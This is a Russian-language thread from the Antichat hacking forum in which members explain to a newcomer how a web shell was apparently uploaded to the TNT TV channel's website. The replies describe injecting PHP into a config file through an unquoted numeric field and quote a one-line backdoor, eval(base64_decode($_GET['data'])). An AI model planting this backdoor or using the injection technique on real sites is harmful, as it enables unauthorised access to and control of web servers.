Взлом сайта ТНТ - Новый регион

Discussion in 'Video.Antichat' started by kovalb83, 3 Sep 2013.

  1. kovalb83

    kovalb83 New Member

    Joined:
    20 Aug 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем привет ребята)))) :) :) :) Недавно в нете нарыл вот такой видос http://www.youtube.com/watch?v=Wcvz_m2D0W4 если это не фейк, не могли бы ВЫ объяснить новичку каким макаром этот тип залил шелл на такой известный сайт как ТНТ? Буду оч презнателен тем кто расскажет всё в подробностях., ну там все команды которые он писал, и что они означают.... Просто давно я сижу на этом форуме,, но про такой способ заливки шелла ещё не читал, да и в принципе не видел))))) Заранее спасибо Всем :) :) :)
     
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Запись произвольного PHP-кода в файл конфига, через браузер он его запускал, однако лучше бы следовало не использовать GET.
     
    #2 randman, 3 Sep 2013
    Last edited: 3 Sep 2013
  3. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    тут рука лицо а по сабжу все предельно ясно, перезаписал конфиг, уязвимость в данный момент это не экранирование кавычек, а в данном случае в поле числовом их отсутствие что позволило разделить значение переменной символом ";" и дополнить своим кодом после которого оставшийся код был за комментирован "/*"
     
  4. kovalb83

    kovalb83 New Member

    Joined:
    20 Aug 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Спасибо Вам ребята ))))Всё потихоньку начинает становиться на свои места....Оч признателен Вам

    Не понятно тока одно.......если уязвимость в "кавычках" то в моём понимание это SQL инъекция, и мне покоя не даёт одно, причём тут Base 64?
     
    #4 kovalb83, 5 Sep 2013
    Last edited by a moderator: 5 Sep 2013
  5. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    SQL-инъекция тут не при чем... Base64 используется в мини-шелле:
    PHP:
    eval(base64_decode($_GET['data']));
     
    #5 randman, 5 Sep 2013
    Last edited: 5 Sep 2013
  6. kovalb83

    kovalb83 New Member

    Joined:
    20 Aug 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    А вот такой вопросик, если мини шелл залит в фото и идёт раскрутка через base64 , зачем тогда в том же "Байсе" писать ссылку на сайт со скриптом????? получаеться локальный инклуд уже....или я опять не прав???
     
  7. chustik

    chustik New Member

    Joined:
    12 Mar 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    1

    он просто тот файлик скопировал и засунул в shell.php
    источник откуда брать шелл в тхт виде